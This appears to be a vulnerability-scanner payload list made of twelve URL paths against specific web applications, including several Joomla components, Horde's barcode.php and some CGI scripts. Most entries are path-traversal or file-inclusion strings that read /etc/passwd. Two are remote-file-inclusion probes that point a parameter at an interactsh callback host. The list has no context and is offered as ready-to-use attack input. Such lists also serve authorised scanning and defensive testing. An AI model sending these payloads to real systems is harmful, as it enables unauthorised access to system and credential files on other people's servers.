/adm/file.cgi?next_file=%2fetc%2fpasswd
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}
/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}/file.txt
/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
